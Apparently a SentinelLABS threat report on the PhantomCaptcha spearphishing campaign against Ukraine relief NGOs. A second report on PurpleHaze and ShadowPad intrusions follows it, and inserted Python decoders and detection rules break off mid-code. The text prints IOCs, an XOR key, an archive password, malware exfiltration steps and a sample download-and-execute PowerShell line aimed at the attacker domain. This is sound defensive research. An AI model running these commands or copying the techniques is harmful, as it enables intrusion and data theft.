SentinelLABS together with Digital Security Lab of Ukraine has uncovered a coordinated spearphishing campaign targeting individual members of the International Red Cross, Norwegian Refugee Council, UNICEF, and other NGOs involved in war relief efforts and Ukrainian regional government administration.
Threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page.
The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.
Despite six months of preparation, the attackers’ infrastructure was only active for a single day, indicating sophisticated planning and strong commitment to operational security.
An additional infrastructure pivot revealed a mobile attack vector with fake applications aimed at collecting geolocation, contacts, media files and other data from compromised Android devices.
Background
Following intelligence shared by research partner Digital Security Lab of Ukraine, SentinelLABS conducted an investigation into a coordinated spearphishing campaign launched on October 8th, 2025, targeting organizations critical to Ukraine’s war relief efforts.
The campaign was initiated through emails that impersonated the Ukrainian President’s Office and contained a weaponized PDF attachment (SHA-256: e8d0943042e34a37ae8d79aeb4f9a2fa07b4a37955af2b0cc0e232b79c2e72f3) embedded with a malicious link.
PDF document page 1/8
Targeted organizations included the International Committee of the Red Cross (ICRC), United Nations Children’s Fund (UNICEF) Ukraine office, Norwegian Refugee Council, Council of Europe’s Register of Damage for Ukraine, and Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava, and Mikolaevsk regions.
The weaponized PDF was an 8-page document that appeared to be a legitimate governmental communique. VirusTotal submissions on October 8th showed the malicious file uploaded from multiple locations including Ukraine, India, Italy, and Slovakia, suggesting widespread targeting and potential victim interaction with the campaign.
PhantomCaptcha Attack Chain
The PhantomCaptcha campaign employed a sophisticated multi-stage attack chain designed to exploit user trust and bypass traditional security controls.
Opening the weaponized PDF and clicking on the embedded link directed the victim to zoomconference[.]app, a domain masquerading as a legitimate Zoom site but in reality hosting a VPS server located in Finland and owned by Russian provider KVMKA.
Our analysis showed that zoomconference[.]app, hosted on IP 193.233.23[.]81, stopped resolving on the same day the attack attempt took place, indicating a single day operation. However, we were able to retrieve the server response from a record captured on VirusTotal. The server response showed that any visitors to the site encountered a convincing fake Cloudflare DDoS protection gateway.
Initial view of a page from zoomconference[.]app
After loading, the fake Cloudflare page attempts to establish a WebSocket connection to the attackers’ server, passing a randomly generated client identifier, clientId, produced by an embedded JavaScript function generateRandomId(). A JavaScript comment before the function suggests the client identifier should be 32 characters long; however, the code generates only 2 characters for clientId.
The attack infrastructure supported two potential infection paths. If the WebSocket server responded with a matching identifier, the victim’s browser would redirect to a legitimate, password-protected Zoom meeting. This infection path likely enabled live social engineering calls with victims; however, activation of this path was not observed during our investigation.
The primary infection vector relied on a variation of a social engineering technique that has been widely deployed by a variety of threat actors since mid-2024. Dubbed ClickFix or Paste and Run, it involves convincing the target to execute commands either deliberately or surreptitiously copied to the user’s clipboard. The PhantomCaptcha variant of this technique works as follows.
After the fake “automatic” verification process, victims are presented with a simulated reCaptcha challenge displaying an “I’m not a robot” checkbox.
Simulated reCaptcha controls
Clicking the checkbox triggers a popup with instructions in Ukrainian, directing users to
Click the “Copy token” button in the popup
Press Windows + R to open the Run dialog
Paste and execute the command
Custom reCaptcha popup in Ukrainian with “Copy token” button
The button runs a function copyToken() which places a PowerShell command line on the clipboard, crafted to run with a hidden window.
The code downloads and executes the next stage PowerShell script from hxxps://zoomconference[.]app/cptch/${clientId}, where ${clientId} is the same ID as described above.
This social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files.
Infection paths
Our analysis suggests this attack chain has overlaps with recently-reported activity attributed to COLDRIVER, a Russian FSB-linked threat cluster, by several industry peers [1, 2, 3]. We continue to investigate whether this attribution can be confidently extended to the PhantomCaptcha campaign.
Multi-Stage Payload Delivery
Although the malware distribution server at zoomconference[.]app was not available at the time of analysis, we managed to discover additional infrastructure and payloads from malware repositories by querying for files from URLs ending with /cptch.
Our analysis revealed that the PhantomCaptcha campaign aimed to deliver PowerShell malware in three stages.
Stage 1: Obfuscated Downloader
The initial payload (SHA-256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44) was a heavily obfuscated PowerShell script named cptch and exceeding 500KB in size. Despite its apparent complexity, the cptch script’s core functionality is simply to download and execute a second-stage payload from hxxps://bsnowcommunications[.]com/maintenance.
The cptch file is a heavily obfuscated PowerShell script
The entire inflated script can be reduced to a single line that downloads the maintenance script from that URL and invokes it.
Using massive obfuscation to obscure simple functionality is likely designed to evade signature-based detection and complicate analysis efforts.
Stage 2: Fingerprinting and Encrypted Comms
The second-stage payload (SHA-256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566) is named maintenance and performs system reconnaissance, collecting:
Computer name
Domain information
Username
Process ID
System UUID (hardware identifier)
This data was XOR-encrypted with the hardcoded key b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l and sent to hxxps://bsnowcommunications[.]com/maintenance/<data> via HTTPS GET requests.
Part of the maintenance script and the hardcoded XOR key used for encryption
The script also disabled PowerShell command history logging via Set-PSReadlineOption -HistorySaveStyle SaveNothing as a means of evading forensic analysis.
The server responded with an encrypted payload containing the third and final stage, which was decrypted and executed in memory.
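To make the stage-2 beacon concrete, here is an added Python decoder (our illustration, not the maintenance script itself). It reproduces the repeating-key XOR with the key quoted above and recovers the fingerprint from a proxy-logged request to the /maintenance/<data> path. The report does not give the field layout or the text encoding of the XOR output, so the '|'-joined field order and the hex encoding are assumptions, and the sample host values are constructed.

```python
"""Decode a PhantomCaptcha-style stage-2 fingerprint beacon.

Added example, not the implant's code. Known from the report: the fields
collected, the 32-byte XOR key and the transport (GET to
hxxps://bsnowcommunications[.]com/maintenance/<data>). Assumed here: fields
joined with '|' and the XOR output hex-encoded for the URL.
"""
from itertools import cycle
from urllib.parse import urlparse

XOR_KEY = b"b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l"      # hardcoded key quoted in the report
FIELDS = ("computer_name", "domain", "username", "pid", "uuid")  # order assumed
BEACON_PREFIX = "/maintenance/"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so one routine encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def encode_beacon(fingerprint: dict, key: bytes = XOR_KEY) -> str:
    """Serialise a fingerprint the way an implant might (assumed layout)."""
    plain = "|".join(str(fingerprint[f]) for f in FIELDS).encode()
    return xor_bytes(plain, key).hex()


def decode_beacon(token: str, key: bytes = XOR_KEY) -> dict:
    """Recover the fingerprint from the <data> path component."""
    plain = xor_bytes(bytes.fromhex(token), key).decode("utf-8", errors="replace")
    parts = plain.split("|")
    if len(parts) != len(FIELDS):
        raise ValueError("unexpected field count: wrong key or different layout")
    return dict(zip(FIELDS, parts))


def decode_beacon_url(url: str, key: bytes = XOR_KEY) -> dict:
    """Pull the token out of a logged request and decode it."""
    path = urlparse(url).path
    if not path.startswith(BEACON_PREFIX):
        raise ValueError("not a /maintenance/<data> beacon URL")
    return decode_beacon(path[len(BEACON_PREFIX):], key)


# Constructed sample host (not an observed victim): what a compromised
# machine would send after the reconnaissance step.
SAMPLE_FINGERPRINT = {
    "computer_name": "WS-FIN-07",
    "domain": "NGO-RELIEF",
    "username": "o.kovalenko",
    "pid": 4812,
    "uuid": "4C4C4544-0052-4B10-8058-B7C04F503733",
}
SAMPLE_URL = "hxxps://bsnowcommunications[.]com" + BEACON_PREFIX + encode_beacon(SAMPLE_FINGERPRINT)

if __name__ == "__main__":
    print(SAMPLE_URL)
    print(decode_beacon_url(SAMPLE_URL))
```

Because the key is hardcoded and the scheme is plain XOR, anyone holding the script can decode every beacon ever sent; a defender with proxy logs can therefore enumerate which hosts checked in and under which user.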
Stage 3: WebSocket-Based Remote Access Trojan
The final payload (SHA-256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23) is a lightweight PowerShell backdoor that connects (and repeatedly reconnects) to a remote WebSocket server at wss://bsnowcommunications[.]com:80. It receives Base64-encoded JSON messages that contain one of:
cmd: a command that is decoded and executed synchronously with iex (Invoke-Expression)
Executing a command with iex (Invoke-Expression)
psh: a PowerShell payload that is decoded and executed asynchronously through a PowerShell runspace delegate
Executing a PowerShell payload from the server
After execution, the script collects output, the current working directory, the machine HWID (UUID via WMI), PID, and an IDC identifier from the server message, converts that to JSON, and sends it back over the WebSocket. It is designed to run in an infinite loop, with reconnect logic and basic error handling.
The WebSocket-based RAT is a remote command execution backdoor, effectively a remote shell that gives an operator arbitrary access to the host.
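The following added Python example (ours, not the backdoor's code) models the message format just described so that a captured WebSocket session can be reconstructed offline: tasks carrying cmd or psh are paired with the replies carrying output, cwd, HWID, PID and IDC. From the report we know the outer envelope is Base64-encoded JSON and which fields travel in each direction; the inner Base64 of the task body, the lowercase JSON key names and the constructed frames are assumptions.

```python
"""Reconstruct an operator session from captured PhantomCaptcha-style RAT frames.

Added example, not the implant's code. Known from the report: Base64-encoded
JSON envelopes; 'cmd' runs synchronously via iex, 'psh' asynchronously in a
runspace; replies carry output, cwd, HWID, PID and the IDC from the task.
Assumed: inner Base64 task body and the exact JSON key names.
"""
import base64
import json

TASK_KEYS = ("cmd", "psh")
REPLY_FIELDS = ("output", "cwd", "hwid", "pid", "idc")


def encode_frame(obj: dict) -> str:
    """Outer envelope: JSON, then Base64."""
    return base64.b64encode(json.dumps(obj).encode()).decode()


def decode_frame(frame: str) -> dict:
    return json.loads(base64.b64decode(frame).decode())


def make_task(kind: str, body: str, idc: str) -> str:
    """Build a C2 task frame (inner body Base64, assumed)."""
    if kind not in TASK_KEYS:
        raise ValueError(f"unknown task kind {kind!r}")
    return encode_frame({kind: base64.b64encode(body.encode()).decode(), "idc": idc})


def make_reply(output: str, cwd: str, hwid: str, pid: int, idc: str) -> str:
    return encode_frame(dict(zip(REPLY_FIELDS, (output, cwd, hwid, pid, idc))))


def parse_task(frame: str) -> dict:
    msg = decode_frame(frame)
    kinds = [k for k in TASK_KEYS if k in msg]
    if len(kinds) != 1:
        raise ValueError("a task frame must carry exactly one of cmd/psh")
    kind = kinds[0]
    return {
        "kind": kind,
        "body": base64.b64decode(msg[kind]).decode(),
        "idc": msg.get("idc"),
        "async": kind == "psh",   # psh runs in a runspace delegate, cmd blocks
    }


def parse_reply(frame: str) -> dict:
    msg = decode_frame(frame)
    return {f: msg.get(f) for f in REPLY_FIELDS}


def reconstruct_session(frames):
    """frames: iterable of (direction, frame) in capture order.

    Pairs each reply with its task via IDC; tasks without a reply are
    reported separately (useful when the capture ends mid-session).
    """
    pending, completed = {}, []
    for direction, frame in frames:
        if direction == "c2>victim":
            task = parse_task(frame)
            pending[task["idc"]] = task
        elif direction == "victim>c2":
            reply = parse_reply(frame)
            completed.append({"task": pending.pop(reply["idc"], None), "reply": reply})
        else:
            raise ValueError(f"bad direction {direction!r}")
    return {"completed": completed, "unanswered": list(pending.values())}


# Constructed capture (not real traffic): two tasks, only the first answered.
SAMPLE_FRAMES = [
    ("c2>victim", make_task("cmd", "whoami /all", "t-01")),
    ("victim>c2", make_reply("ngo-relief\\o.kovalenko", "C:\\Users\\o.kovalenko",
                             "4C4C4544-0052-4B10-8058-B7C04F503733", 4812, "t-01")),
    ("c2>victim", make_task("psh", "Get-ChildItem -Recurse $env:USERPROFILE\\Documents", "t-02")),
]

if __name__ == "__main__":
    print(json.dumps(reconstruct_session(SAMPLE_FRAMES), indent=2))
```

Pairing on IDC rather than on frame order matters because psh tasks run asynchronously, so their replies can arrive out of sequence or not at all.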
Infrastructure Analysis
PhantomCaptcha demonstrated a moderate level of operational security through its brief active window. The C2 domain zoomconference[.]app resolved to 193.233.23[.]81, a VPS server hosted by Russian provider KVMKA. SentinelLABS’ analysis revealed the infrastructure was active for only about 24 hours on October 8, 2025, with ports 443 and 80 closed by the time of our investigation.
By fingerprinting the cached server response, we identified a further malicious IP address, 45.15.156[.]24, to which goodhillsenterprise[.]com resolves and which has previously been seen serving obfuscated PowerShell malware scripts [1, 2]. We assess, with medium confidence, that 45.15.156[.]24 is currently or has recently been under the control of the threat actors behind PhantomCaptcha.
The C2 domain bsnowcommunications[.]com is linked to IP 185.142.33[.]131. Unlike the public-facing lure domain, this backend C2 infrastructure remains active, indicating strong compartmentalization and the need to maintain certain infrastructure for already-compromised systems.
We also found that on October 9, 2025, the day after the initial attack, a domain with the name zoomconference[.]click was registered, potentially indicating plans for continued operations.
PhantomCaptcha 2025 Attack Timeline
March – According to the earliest related event (registration of goodhillsenterprise[.]com), the attackers started their operations on 2025-03-27.
July – A number of malicious PowerShell scripts and other malware samples were developed and tested on VirusTotal in July 2025.
September – SSL certificates from Let’s Encrypt for the related domains were issued on Sep 15 and Sep 25, 2025.
October – Internal timestamps in the lure PDF date back to August 2025 but were updated on Oct 8, 2025, the same day the email with the malicious attachment was sent. The attack domain was shut down that same day, only for a counterpart to appear the following day (Oct 9, 2025) under a different top-level domain.
Pivot to Additional Campaign
One interesting pivot from our infrastructure analysis revealed a link to a wider campaign making use of adult-oriented social and entertainment lures, with potential links to Russia/Belarus source development.
As noted earlier, the PhantomCaptcha zoom-themed domains were hosted on 193.233.23[.]81. During our analysis, the same IP began hosting a new domain, princess-mens[.]click, which appeared similar in ownership and configuration. Collected HTTPS response data from zoomconference[.]click also began including content identical to that found in the new domain, indicating a direct overlap in ownership of both domains.
Domain timeline, focused on October and later, on 193.233.23[.]81
zoomconference[.]click HTTPS response data matching princess-mens[.]click
The princess-mens[.]click domain has been observed linked to an Android application called princess.apk, hosted at https://princess-mens[.]click/princess.apk. The domain’s content and the APK are themed around an adult entertainment venue in Lviv, Ukraine, called Princess Men’s Club. Similar APKs can be found in other themes as well, such as “Cloud Storage”.
App requesting device location
The application collects a variety of data to send to a hardcoded C2, which itself can be linked to additional infrastructure and samples. The samples use the HTTPS protocol and communicate over port 5000 to various server paths such as /check_update, /data, and /upload. For example:
https://[IP ADDRESS]:5000/check_update?version=[APP VERSION NUMBER]
The APK’s collectAndSendAllData() method is designed to gather a wide range of personal and device information. Based on the variable names in the code, the specific data being collected appears to be as follows.
Contacts data: phonebook entries (names, numbers, emails).
Call logs: incoming, outgoing, and missed calls.
Installed apps: list of all installed applications.
SIM numbers/data: SIM card information such as numbers, IMSI, or carrier details.
Device info: hardware model, OS version, manufacturer, and possibly device ID.
Network info: connected network type (Wi-Fi, mobile, etc.).
Wi-Fi SSID: name of the currently connected Wi-Fi network.
Location data: GPS or last known location of the device.
Public IP address: external IP visible to the internet.
Gallery images: photos or image metadata stored on the device.
While these findings indicate a possible relation to the PhantomCaptcha campaign, we are currently tracking it as a separate cluster of activity and encourage the research community to further pursue this lead for additional insight. We provide indicators that may be fruitful to explore at the end of this post.
Security Implications
Legitimate services do not require pasting commands into Windows Run dialog (Win+R) or similar interfaces. Hence, user awareness training on “Paste and Run” social engineering techniques can help prevent attacks using this infection vector. Similarly, unexpected communications from government offices can be independently verified through known channels.
From a technical perspective, PowerShell execution logging and monitoring provides visibility into commands using hidden window styles, execution policy bypasses, or attempts to disable command history logging. Additionally, network security teams can monitor for WebSocket connections to recently-registered or suspicious domains, particularly those mimicking legitimate services.
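As an added example of the logging-based detection described above (ours, not from the report), the following Python scans PowerShell command lines and script-block text for the evasions named here (hidden window style, execution policy bypass, disabled history logging) plus a download-and-invoke pattern, and scores each event. The log entries are constructed; the first models the kind of one-liner the “Copy token” button is described as producing and is not the actual command from the campaign.

```python
"""Score PowerShell log entries for ClickFix-style evasion indicators.

Added example, not SentinelOne detection content. Input is any text that
carries a PowerShell command line or script block, for example Security
4688 command lines or PowerShell 4104 ScriptBlock text.
"""
import re

RULES = {
    # -w hidden / -win hidden / -WindowStyle Hidden / -w h
    "hidden_window": re.compile(r"-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b", re.I),
    # -ep bypass / -ex bypass / -exec bypass / -ExecutionPolicy Bypass
    "execution_policy_bypass": re.compile(r"-e(?:p|x(?:ec(?:utionpolicy)?)?)\s+bypass\b", re.I),
    # the exact cmdlet call the stage-2 script is reported to use
    "history_logging_disabled": re.compile(
        r"Set-PSReadLineOption\s+-HistorySaveStyle\s+SaveNothing", re.I),
    # fetch something remote and hand it straight to Invoke-Expression
    "download_and_invoke": re.compile(
        r"(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b[^\n]*?\|\s*iex\b"
        r"|\biex\b\s*\(?\s*(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|\(?New-Object\s+Net\.WebClient)",
        re.I),
}

# Weights are a judgement call: disabling history and piping to iex are
# rarely legitimate, hidden windows and bypass show up in some admin tooling.
WEIGHTS = {
    "hidden_window": 2,
    "execution_policy_bypass": 2,
    "history_logging_disabled": 3,
    "download_and_invoke": 3,
}
ALERT_THRESHOLD = 4


def inspect(text: str) -> dict:
    """Return the rules a single command line / script block trips."""
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    score = sum(WEIGHTS[h] for h in hits)
    return {"hits": hits, "score": score, "alert": score >= ALERT_THRESHOLD}


def triage(events) -> list:
    """events: iterable of (event_id, text). Keeps only entries with hits."""
    findings = []
    for index, (event_id, text) in enumerate(events):
        result = inspect(text)
        if result["hits"]:
            findings.append({"index": index, "event_id": event_id, **result})
    return findings


# Constructed log entries (not real telemetry). Entry 0 is modelled on the
# behaviour the report describes, not copied from the campaign.
SAMPLE_EVENTS = [
    (4688, 'powershell.exe -w hidden -ep bypass -c "irm hxxps://zoomconference[.]app/cptch/ab | iex"'),
    (4104, "Set-PSReadLineOption -HistorySaveStyle SaveNothing"),
    (4104, "Get-ChildItem -Path C:\\Users -Recurse | Where-Object Length -gt 1MB"),
    (4688, 'powershell.exe -NoProfile -Command "Get-Service"'),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The weak spot of any pattern list is that the stage-1 script is heavily obfuscated; these rules catch the launcher and the stage-2 behaviour, which is why the page recommends script-block logging (the deobfuscated code is what gets logged at execution) rather than file signatures.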
We provide a comprehensive list of Indicators of Compromise below to support threat hunting and detection efforts.
Conclusion
The PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control. The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.
The targeting of organizations supporting Ukraine’s relief efforts also reveals an adversary seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts.
SentinelLABS continues to monitor infrastructure associated with this threat actor and will provide updates as new information becomes available.
Acknowledgments
We would like to express our thanks to partners in the region, including Digital Security Lab of Ukraine for their invaluable collaboration on this case.
Organizations that believe they may have been targeted by threat actors involved in this campaign are invited to reach out to the SentinelLABS team via ThreatTips@sentinelone.com.
In October 2024, SentinelLABS observed and countered a reconnaissance operation targeting SentinelOne, which we track as part of a broader activity cluster named PurpleHaze.
At the beginning of 2025, we also identified and helped disrupt an intrusion linked to a wider ShadowPad operation. The affected organization was responsible for managing hardware logistics for SentinelOne employees at the time.
A thorough investigation of SentinelOne’s infrastructure, software, and hardware assets confirmed that the attackers were unsuccessful and SentinelOne was not compromised by any of these activities.
The PurpleHaze and ShadowPad activity clusters span multiple partially related intrusions into different targets occurring between July 2024 and March 2025. The victimology includes a South Asian government entity, a European media organization, and more than 70 organizations across a wide range of sectors.
We attribute the PurpleHaze and ShadowPad activity clusters with high confidence to China-nexus threat actors. We loosely associate some PurpleHaze intrusions with actors that overlap with the suspected Chinese cyberespionage groups publicly reported as APT15 and UNC5174.
This research underscores the persistent threat Chinese cyberespionage actors pose to global industries and public sector organizations, while also highlighting a rarely discussed target they pursue: cybersecurity vendors.
Overview
This research outlines threats that SentinelLABS observed and defended against in late 2024 and the first quarter of 2025. This post expands upon previous SentinelLABS research, which provides an overview of threats against cybersecurity vendors, including SentinelOne, ranging from financially motivated crimeware to targeted attacks by nation-state actors. This research focuses specifically on the subset of threats targeting SentinelOne and others that we attribute to China-nexus threat actors.
By disclosing details of the threat activities we have faced, we bring into focus an aspect of the threat landscape that has received limited attention in public cyber threat intelligence discourse: the targeting of cybersecurity vendors. Our objective is to contribute to strengthening industry defenses by promoting transparency and encouraging collaboration. Cybersecurity companies are high-value targets for threat actors due to their protective roles, deep visibility into client environments, and ability to disrupt adversary operations. The findings detailed in this post highlight the persistent interest of China-nexus actors in these organizations.
This research focuses on the following activities targeting SentinelOne, as well as suspected related operations identified during our investigations:
An intrusion into an IT services and logistics organization, which was responsible at the time for managing hardware logistics for SentinelOne employees.
Extensive remote reconnaissance of SentinelOne servers intentionally reachable from the Internet by virtue of their functionality.
We promptly informed the IT services and logistics organization of the intrusion details. A thorough investigation into SentinelOne’s infrastructure, software, and hardware assets found no evidence of compromise.
At this point, it remains unclear whether the perpetrators’ focus was solely on the targeted IT logistics organization or if they intended to extend their reach to downstream organizations as well. Nevertheless, this case underscores the persistent threat posed by suspected Chinese threat actors, who have a history of seeking to establish strategic footholds to potentially compromise downstream entities.
As for the reconnaissance activity, we promptly identified and mapped the threat actor’s infrastructure involved in this operation as soon as it began. A thorough investigation of SentinelOne servers probed by the attackers revealed no signs of compromise. We assess with high confidence that the threat actor’s activities were limited to mapping and evaluating the availability of select Internet-facing servers, likely in preparation for potential future actions. Continuous monitoring of network traffic to our servers, which is part of established and continuing practice for protecting SentinelOne assets exposed to the Internet, enabled rapid detection and increased scrutiny to the reconnaissance activities, effectively mitigating any potential risks.
Further investigations uncovered multiple, partially related intrusions and clusters of activity characteristic of modern Chinese-nexus operations:
Activity A: June 2024 intrusion into a South Asian government entity
Activity B: A set of intrusions impacting organizations worldwide occurring between July 2024 and March 2025
Activity C: Intrusion into an IT services and logistics company at the beginning of 2025
Activity D: October 2024 intrusion into the same government entity compromised in June 2024
Activity E: October 2024 reconnaissance activity targeting SentinelOne
Activity F: September 2024 intrusion into a leading European media organization
The next two sections provide an overview of these activities, including timelines, points of overlap, and our attribution assessments, followed by concrete technical details, such as observed TTPs, malware, and infrastructure to enable other organizations in related sectors to investigate and mitigate similar sets of activity.
Overview | ShadowPad Intrusions
ShadowPad activity, June 2024 – March 2025
In June 2024, SentinelLABS observed threat actor activity involving the ShadowPad malware targeting a South Asian government entity that provides IT solutions and infrastructure across multiple sectors (Activity A). The ShadowPad sample we retrieved was obfuscated using a variant of ScatterBrain, an evolution of the ScatterBee obfuscation mechanism.
Based on ShadowPad implementation characteristics, we identified additional samples that revealed broader activity taking place between July 2024 and March 2025, spanning a wide range of victims globally (Activity B). Using C2 netflow and SentinelOne telemetry data, SentinelLABS uncovered over 70 victims across sectors such as manufacturing, government, finance, telecommunications, and research. Potentially affected SentinelOne customers were proactively contacted by our Threat Discovery and Response (TDR) teams. One of the impacted entities was an IT services and logistics company, which had been responsible for managing hardware logistics for SentinelOne employees during that period (Activity C).
We attribute these intrusions with high confidence to China-nexus actors, with ongoing efforts aimed at determining the specific threat clusters involved. ShadowPad is a closed-source modular backdoor platform used by multiple suspected China-nexus threat actors to conduct cyberespionage. Google Threat Intelligence Group has observed the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attributes them to clusters associated with the suspected Chinese APT umbrella actor APT41.
Several of the ShadowPad samples and infrastructure we identified have also been documented in previous public reporting on recent ShadowPad activities, including research published by TrendMicro, Orange Cyberdefense, and Check Point. Some of these activities have included the deployment of ransomware referred to as NailaoLocker, though the motive remains unclear, whether for financial gain or as a means of distraction, misattribution, or removal of evidence.
Overview | The PurpleHaze Activity Cluster
PurpleHaze activity, September – October 2024
In early October 2024, SentinelLABS observed new threat actor activity (Activity D) at the same South Asian government entity compromised using ShadowPad in June 2024 (Activity A).
This intrusion involved backdoors that we classify as part of a malware cluster designated GOREshell, our designation for a loose malware cluster that includes the open-source reverse_ssh backdoor and its custom variants, which we have observed in targeted attacks. While these variants exhibit variations in implementation, all share code similarities with the client component of reverse_ssh.
We track some of the infrastructure used in this intrusion as part of an operational relay box (ORB) network used by several suspected Chinese cyberespionage actors, particularly a threat group that overlaps with public reporting on APT15. The use of ORB networks is a growing trend among Chinese threat groups, since they can be rapidly expanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their attribution challenging. APT15, also historically referred to as Ke3Chang and Nylon Typhoon, is a suspected Chinese cyberespionage actor known for its global targeting of critical sectors, including telecommunications, information technology, and government organizations.
Further, in October 2024, the same month as the activity targeting the South Asian government entity, SentinelLABS observed remote connections to Internet-facing SentinelOne servers for reconnaissance (Activity E). Based on significant overlaps in infrastructure management, as well as domain creation and naming practices, we associate with high confidence the infrastructure observed in the reconnaissance operation with that used by the threat actor targeting the South Asian government entity (Activity D). This suggests the involvement of the same threat actor, or of a third-party entity responsible for managing infrastructure for multiple threat groups, a common practice in the Chinese cyberespionage landscape.
In late September 2024, a few weeks before the October activities, SentinelLABS observed an intrusion into a leading European media organization (Activity F). Our investigation revealed overlaps in the tools used during this intrusion and the October 2024 activity targeting the South Asian government entity (Activity D). This includes the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice (THC), a community of cybersecurity researchers.
Activity D and Activity F are the first instances in which we have observed THC tooling used in the context of APT activities.
We attribute Activity F with high confidence to a China-nexus actor, loosely associating it with a suspected Chinese initial access broker tracked as UNC5174 by Mandiant. We acknowledge the possibility that post-intrusion activities may have been conducted by a different threat group.
The threat actor leveraged ORB network infrastructure, which we assess to be operated from China, and exploited the CVE-2024-8963 vulnerability together with CVE-2024-8190 to establish an initial foothold, a few days before the vulnerabilities were publicly disclosed. This intrusion method suggests the involvement of UNC5174, which is assessed to be a contractor for China’s Ministry of State Security (MSS) primarily focusing on gaining access and specializing in exploiting vulnerabilities in targeted systems. After compromising these systems, UNC5174 is suspected of transferring access to other threat actors.
In January 2025, CISA and the FBI released a joint advisory reporting threat actor activities that also took place in September 2024, involving the chained exploitation of CVE-2024-8963 and CVE-2024-8190, without providing specific attribution assessments. In March 2025, the French Cybersecurity Agency (ANSSI) released its 2024 cyber threat overview report, which documents intrusions that occurred in September 2024, involved the same vulnerabilities, and show overlaps in TTPs associated with UNC5174.
Additionally, Mandiant has observed UNC5174 exploiting the CVE-2023-46747 and CVE-2024-1709 vulnerabilities and deploying a publicly available backdoor tracked as GOREVERSE. Strings and code segments in the public GOREVERSE YARA rule provided by Mandiant match the reverse_ssh backdoor, placing GOREVERSE in the GOREshell malware cluster, samples of which we observed in both this intrusion and the October 2024 activity targeting the South Asian government entity.
We collectively track Activity D, E and F as the PurpleHaze threat cluster. While we attribute PurpleHaze with high confidence to China-nexus threat actors, investigations continue to determine the specific threat groups behind the activities and their potential links to the June 2024 and later ShadowPad intrusions (Activity A, B, and C).
We do not rule out the involvement of distinct threat groups or the possibility of multiple intrusions conducted by the same threat actor, especially given the widespread use of publicly available tools and the extensive sharing of malware, infrastructure, and operational practices among Chinese threat groups. We also consider the possibility that access may have been transferred between different actors, particularly in light of the suspected involvement of UNC5174.
Technical Details | ShadowPad Intrusions
We present below technical details on the ShadowPad intrusion into the South Asian government entity in June 2024 (Activity A), as well as on the broader ShadowPad activities that took place between July 2024 and March 2025 (Activity B and C).
Activity A | ShadowPad and ScatterBrain Obfuscation
This intrusion involved the deployment of a ShadowPad sample named AppSov.exe. The threat actor deployed AppSov.exe by executing a PowerShell command that performs the following actions:
Downloads a file named x.dat from a remote endpoint using curl.exe after a 60-second delay.
Saves the downloaded file as AppSov.exe in the C:\ProgramData\ directory.
Launches the executable using the Start-Process PowerShell command.
The endpoint hosting x.dat was a previously compromised system within the same organization. Our analysis revealed that malware artifacts had been deployed on this system approximately one month prior to the ShadowPad deployment. These include the agent component of the Nimbo-C2 open-source remote access framework, as well as a PowerShell script that performs the following actions:
Collects sensitive user data (documents, credentials, and cryptographic material) by recursively searching C:\Users\ for files modified in the previous 600 days and with the following extensions: *.xls, *.xlsx, *.ods, *.txt, *.pem, *.cert, and *.pfx.
Copies the collected files to a temporary folder at C:\windows\vss\temp.
Archives the collected files into an archive file named with the system’s MAC address and date, likely for tracking compromised endpoints.
Encrypts and password-protects the archive using 7-Zip with the password @WsxCFt6&UJMmko0, ensuring the data is obfuscated from inspection.
Exfiltrates the encrypted archive via a curl POST request to a hardcoded URL: https[://]45.13.199[.]209/rss/rss.php.
Removes traces by deleting the temporary folder, archive, and DAT files after exfiltration to avoid detection and forensic recovery.
PowerShell exfiltration script
The Nimbo-C2 agent was deployed to C:\ProgramData\Prefetch\PfSvc.exe, likely masquerading as a Privacyware Privatefirewall executable.
We have not previously observed the use of Nimbo-C2 or variants of the PowerShell exfiltration script in the context of suspected Chinese APT activity. Previous research has documented the use of Nimbo-C2 in operations attributed to APT-K-47 (also known as Mysterious Elephant), a threat actor believed to originate from South Asia.
The deployment of the ShadowPad sample AppSov.exe raises several possibilities:
the same threat actor conducted both the earlier activity and the ShadowPad deployment,
access was handed off to, or leveraged by, a second actor, or
two distinct actors operated independently within the same environment.
AppSov.exe was obfuscated using a variant of ScatterBrain. The malware uses the domain news.imaginerjp[.]com and the IP address 65.38.120[.]110 for C2 communication and resolves its C2 over DNS over HTTPS (DoH), which Base64-encodes the queried domain and so hides the lookup from conventional DNS monitoring.
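To show that such a DoH lookup can still be inspected when the HTTPS request itself is visible (at a TLS-intercepting proxy, for instance), here is an added Python example, ours and not ShadowPad code. It assumes the standard RFC 8484 GET form, where the whole DNS query travels base64url-encoded in the dns parameter; the report only says the queried names are Base64-encoded, so the exact request shape is an assumption, and the resolver URL is a placeholder.

```python
"""Recover the name looked up inside a DNS-over-HTTPS GET request.

Added defender-side example. Assumes RFC 8484 GET transport: the DNS wire
message, base64url-encoded without padding, in the 'dns' query parameter.
"""
import base64
import struct
from urllib.parse import parse_qs, urlparse


def _b64url_decode(s: str) -> bytes:
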